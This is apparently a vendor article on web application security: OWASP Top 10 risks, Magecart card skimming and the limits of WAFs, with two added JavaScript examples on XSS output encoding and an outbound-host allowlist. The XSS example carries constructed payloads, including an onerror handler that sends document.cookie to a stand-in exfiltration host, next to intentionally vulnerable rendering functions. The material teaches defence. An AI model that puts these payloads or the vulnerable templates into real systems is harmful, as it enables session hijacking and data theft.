Getting ahead of web app security threats
As web application technology evolves, security measures must keep pace. Attacks on web applications are happening every day, across the globe, and the standard controls of a few years ago no longer cover the threats in play. Fortunately, applications do not have to sit waiting to be exploited by bad actors: there are proven measures and practices for protecting this ever-growing attack surface.
Web applications have evolved—so must security
New attack vectors emerge as the technology changes, and the tooling has to be comprehensive to match. Endpoint protection on managed devices plus network security at the perimeter was once the state of the art. Mobile and cloud adoption then moved users, devices and data outside that perimeter, sharply reducing what network controls can see and breaking the perimeter-centric model organizations had relied on.
Fast-forward to today, where a whole new way of reaching back-office systems has taken hold, opening up new business opportunities, legitimate and otherwise. Organizations increasingly rely on application programming interfaces (APIs) to drive innovation, speed up development, and create new monetization opportunities. But, as the Open Web Application Security Project (OWASP) API Security Top 10 2019 report puts it, “By nature, APIs expose application logic and sensitive data such as Personally Identifiable Information (PII) and because of this, APIs have increasingly become a target for attackers.” Moving important components to the client side of applications, outside the reach of traditional network security, creates a large new attack surface and raises the risk of attacks such as formjacking, Document Object Model (DOM) tampering, session abuse, overlay attacks, and API abuse.
Unfortunately, many organizations still believe a web application firewall (WAF) is all that is needed to protect web apps. In reality a WAF is only part of the solution. A WAF inspects traffic between the client and the server; an attack that executes in the user's browser, such as a skimming script injected into a checkout page, sends the stolen data straight to the attacker and never passes through it. By the time a server-side control fires, if it ever does, the bad actor is long gone with the sensitive information and all that remains is damage control.
As bad actors continue pushing boundaries in identifying new attack vectors, organizations must respond in kind to ensure critical assets and data are being properly and fully protected.
Web application security risks are real and happening now
The recent breaches at British Airways and Ticketmaster show the limits of the WAF: in both cases, card-skimming code ran in customers' browsers and sent payment data to attacker-controlled servers, traffic that a WAF in front of the merchant's site, however well configured, would never have seen. By the time the compromises were discovered, hundreds of thousands of customer records had already been exfiltrated, too late for any preventive action.
Common web app vulnerabilities
The OWASP Top 10 (2017 edition) lists the following categories of web application risk:
- Injection. Untrusted data is sent to an interpreter (SQL, NoSQL, OS shell, LDAP) as part of a command or query, so attacker-supplied input is executed as code instead of being treated as data.
- Broken Authentication. Authentication and session management are implemented incorrectly, letting a bad actor compromise passwords, keys or session tokens, or assume another user's identity, up to full control of the system.
- Sensitive Data Exposure. Data that should be protected, such as financial, health or personal information, is stored or transmitted without adequate protection (missing encryption, weak TLS, keys in the clear) and can be stolen or modified.
- XML External Entities (XXE). An application parses XML input with a weakly configured parser that resolves external entity references, allowing an attacker to read local files, probe internal services, or cause a denial of service.
- Broken Access Control. Restrictions on what authenticated users may do are not enforced, so a bad actor can reach other users' data or administrative functions, for example by changing an identifier in a URL or request body.
- Security Misconfiguration. Insecure defaults, unpatched systems, unnecessary features, open cloud storage, default accounts or verbose error messages give bad actors an easy way in.
- Cross-Site Scripting (XSS). The application includes untrusted data in a page without validation or escaping, so a bad actor's client-side script runs in the victim's browser and can hijack the session, rewrite the page, or redirect the user.
- Insecure Deserialization. The application deserializes data an attacker controls, which can lead to remote code execution, replay and injection attacks, or privilege escalation.
- Using Components with Known Vulnerabilities. Libraries and frameworks run with the application's privileges; a component with a publicly known flaw (advisories and changelogs tell bad actors exactly where to look) gives an attacker a ready-made way in, and skipped updates let it survive in production.
- Insufficient Logging and Monitoring. Without effective logging, monitoring and incident response, a compromise goes unnoticed, letting attackers persist, pivot to other systems, and extract data over months.
A WAF sees only the requests that reach the server and can block only those that match a known-bad pattern. Several of these categories, broken access control and broken authentication in particular, look like entirely legitimate traffic at the HTTP layer, and anything that executes in the browser never reaches the WAF at all, so most of this list is outside what a WAF alone can stop.
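The XSS item above is the one that most directly turns into the client-side attacks this page is about, and the fix is output encoding in the template rather than a WAF rule. The following is an added example, not code from this page or from Digital.ai: a comment widget rendered from untrusted input as the vulnerable template, a half-fixed version, and a hardened version, plus a small oracle that tells whether attacker markup survived. The payloads, the comment data and the `exfil.example` host are constructed for the demo.

```javascript
// Added example, not code from this page or from Digital.ai: a comment widget rendered
// from untrusted input, once as the vulnerable template, once half-fixed, and once
// with context-aware output encoding. Payloads and comment data are constructed.

// Escape the characters that change meaning in HTML text and in double-quoted
// attribute values. This is done at output time, in the template, because the
// template is the only place that knows which context a value lands in.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: untrusted strings are concatenated straight into markup.
function renderCommentUnsafe(comment) {
  return `<div class="comment" data-author="${comment.author}">` +
         `<p>${comment.body}</p></div>`;
}

// Half-fixed: the body is escaped but the attribute is not, so an author name
// containing a double quote still breaks out of data-author and adds an event
// handler. This is the most common real-world mistake.
function renderCommentPartial(comment) {
  return `<div class="comment" data-author="${comment.author}">` +
         `<p>${escapeHtml(comment.body)}</p></div>`;
}

// Hardened: every untrusted value is escaped, and the attribute is always
// double-quoted so that a literal " (now &quot;) is the only way out of it.
function renderCommentSafe(comment) {
  return `<div class="comment" data-author="${escapeHtml(comment.author)}">` +
         `<p>${escapeHtml(comment.body)}</p></div>`;
}

// Constructed payloads: the body targets HTML text context; the author closes the
// attribute it lands in and attaches an inline handler.
const BODY_PAYLOAD = '<img src=x onerror="fetch(\'https://exfil.example/?c=\' + document.cookie)">';
const AUTHOR_PAYLOAD = '" onmouseover="document.body.innerHTML=\'owned\'';
const ATTACKER_COMMENT = { author: AUTHOR_PAYLOAD, body: BODY_PAYLOAD };
const NORMAL_COMMENT = { author: 'ana', body: 'Looks great & ships fast <3' };

// Demo oracle: would a browser find a script-bearing construct in this markup?
// It tokenizes just enough HTML to respect quoted attribute values (an escaped
// &quot; inside a value is not a quote); it decodes no entities and is not a
// sanitizer, so do not reuse it as one.
function hasExecutableMarkup(html) {
  const tagRe = /<([a-zA-Z][\w-]*)([^>]*)>/g;
  const attrRe = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>`]+)))?/g;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    if (['script', 'iframe', 'object', 'embed'].includes(tag[1].toLowerCase())) return true;
    attrRe.lastIndex = 0;
    let attr;
    while ((attr = attrRe.exec(tag[2])) !== null) {
      const name = attr[1].toLowerCase();
      const value = attr[2] || attr[3] || attr[4] || '';
      if (/^on[a-z]+$/.test(name)) return true;                       // inline event handler
      if (['href', 'src', 'action', 'formaction'].includes(name) &&
          /^\s*javascript:/i.test(value)) return true;                // javascript: URL
    }
  }
  return false;
}

// Render each variant for the attacker's comment and report whether its markup survived.
function demo() {
  return {
    unsafe: hasExecutableMarkup(renderCommentUnsafe(ATTACKER_COMMENT)),
    partial: hasExecutableMarkup(renderCommentPartial(ATTACKER_COMMENT)),
    safe: hasExecutableMarkup(renderCommentSafe(ATTACKER_COMMENT)),
  };
}
```

The same bug exists purely client-side when a page assigns untrusted data to `innerHTML`; there the fix is `textContent` (or a templating library that escapes by default), and a Content-Security-Policy without `'unsafe-inline'` blocks the inline handlers that survive a missed escape.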
Magecart is always working to exploit web app vulnerabilities
Magecart is the umbrella name for a loose collection of criminal groups that target web apps to steal customer payment card information, typically by injecting card-skimming JavaScript into checkout pages. With these groups working around the clock to exploit web app vulnerabilities, understanding the attack vectors behind their campaigns, and the steps needed to stop them, is critical to protecting web applications.
Practical solutions for protecting web apps
Even with groups like Magecart doing everything possible to develop new exploits and attacks for harvesting sensitive information, web applications can be protected.
Flexible code protection, threat detection and data exfiltration prevention are the elements of a practical web security solution, needed to protect client-side apps and the web services they connect to. All three are included in Digital.ai Application Protection for Web:
- Active Protection. Guards against browser data exfiltration with an in-app firewall that lets the app or API connect only to legitimate servers, and responds automatically with countermeasures, shutting down web app functionality or the whole browser session, when code analysis or tampering is detected.
- Real-Time Threat Notification. Alerts the business when code or page tampering, or analysis of the code, is attempted, so that an immediate operational response can be initiated, such as shutting down attacker accounts or updating the web code protection to counter the attack.
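The core of the "connect only with legitimate servers" control described above is an allowlist applied to every place a skimmer can send data: form actions, script sources, fetch/XHR calls and image or `sendBeacon` beacons. The following is an added illustration, not Digital.ai's product code or any code from this page: a destination classifier and a page audit that applies it to a constructed snapshot of a skimmed checkout page, with guarded browser wiring so the same audit re-runs on DOM changes. The `shop.example` origin, the `ALLOWED_HOSTS` list, the snapshot contents and all function names are assumptions made for the demo.

```javascript
// Added example, not Digital.ai code: an outbound-destination allowlist of the kind an
// "in-app firewall" against browser data exfiltration has to implement, applied to the
// places a skimmer shows up (third-party scripts, rewritten form actions, beacons).
// The origin, allowlist and page snapshot below are constructed for the demo.

const PAGE_ORIGIN = 'https://shop.example';

// Hosts the page may send data to or load code from. A '*.' prefix allows
// subdomains only, never the bare domain.
const ALLOWED_HOSTS = ['shop.example', '*.shop.example', 'checkout.payments.example'];

function hostAllowed(hostname, allowed = ALLOWED_HOSTS) {
  const h = hostname.toLowerCase();
  return allowed.some((entry) => {
    const e = entry.toLowerCase();
    if (e.startsWith('*.')) {
      const suffix = e.slice(1);                       // '.shop.example'
      return h.endsWith(suffix) && h.length > suffix.length;
    }
    return h === e;
  });
}

// Decide whether a destination (form action, fetch/XHR URL, script src, image or
// sendBeacon target) is legitimate. Relative URLs resolve against the page origin.
function classifyDestination(rawUrl, pageOrigin = PAGE_ORIGIN, allowed = ALLOWED_HOSTS) {
  let url;
  try {
    url = new URL(rawUrl, pageOrigin);
  } catch (e) {
    return { allowed: false, reason: 'unparseable URL' };
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') {
    return { allowed: false, reason: 'scheme ' + url.protocol };   // data:, javascript:, ...
  }
  if (!hostAllowed(url.hostname, allowed)) {
    return { allowed: false, reason: 'host ' + url.hostname + ' not allowlisted' };
  }
  if (url.protocol !== 'https:') {
    return { allowed: false, reason: 'plaintext http to allowlisted host' };
  }
  return { allowed: true, reason: 'ok' };
}

// Audit a page snapshot {forms:[{id,action}], scripts:[{src}], requests:[{initiator,url}]}.
// Each violation is a finding the app can act on (block the request, alert, disable checkout).
function auditSnapshot(snapshot, pageOrigin = PAGE_ORIGIN, allowed = ALLOWED_HOSTS) {
  const findings = [];
  const check = (kind, where, target) => {
    const v = classifyDestination(target, pageOrigin, allowed);
    if (!v.allowed) findings.push({ kind, where, target, reason: v.reason });
  };
  for (const f of snapshot.forms) check('form-action', f.id, f.action || '');
  for (const s of snapshot.scripts) check('script-src', s.src, s.src);
  for (const r of snapshot.requests) check('request', r.initiator, r.url);
  return findings;
}

// Constructed snapshot of a checkout page after a skimmer has been injected.
const CHECKOUT_SNAPSHOT = {
  forms: [
    { id: 'payment', action: '/checkout/submit' },                          // relative, first party
    { id: 'newsletter', action: 'https://forms.cdn-cache.example/submit' }, // rewritten by the skimmer
  ],
  scripts: [
    { src: 'https://static.shop.example/app.js' },
    { src: 'https://checkout.payments.example/sdk.js' },
    { src: 'https://js-analytics.example/loader.js' },                      // injected third party
  ],
  requests: [
    { initiator: 'fetch', url: 'https://api.shop.example/cart' },
    { initiator: 'sendBeacon', url: 'https://js-analytics.example/collect?cc=4111' },
    { initiator: 'img', url: 'http://shop.example/track.gif' },             // plaintext downgrade
  ],
};

// Browser wiring, skipped under Node: snapshot the live DOM and re-audit whenever a
// form action or script src changes, which is how a skimmer injected after page load
// shows up. Outbound requests would be fed from a fetch/XHR/sendBeacon wrapper.
function collectSnapshot(doc) {
  return {
    forms: Array.from(doc.querySelectorAll('form')).map((f) => ({ id: f.id, action: f.getAttribute('action') || '' })),
    scripts: Array.from(doc.querySelectorAll('script[src]')).map((s) => ({ src: s.getAttribute('src') })),
    requests: [],
  };
}
if (typeof document !== 'undefined' && typeof MutationObserver !== 'undefined') {
  const report = () => auditSnapshot(collectSnapshot(document), location.origin)
    .forEach((finding) => console.warn('exfil-check', finding));
  report();
  new MutationObserver(report).observe(document.documentElement,
    { childList: true, subtree: true, attributes: true, attributeFilter: ['action', 'src'] });
}
```

Two caveats a practitioner should keep in mind. This check runs in the same JavaScript context the skimmer controls, so it is a detection aid and should sit behind browser-enforced controls that the attacker's script cannot switch off: a Content-Security-Policy with `form-action`, `connect-src` and `script-src` set to the same allowlist, and Subresource Integrity hashes on third-party scripts. And an allowlist only catches off-allowlist hosts; a legitimate third party that is itself compromised passes this check unchanged, which is exactly why pinning third-party script hashes matters.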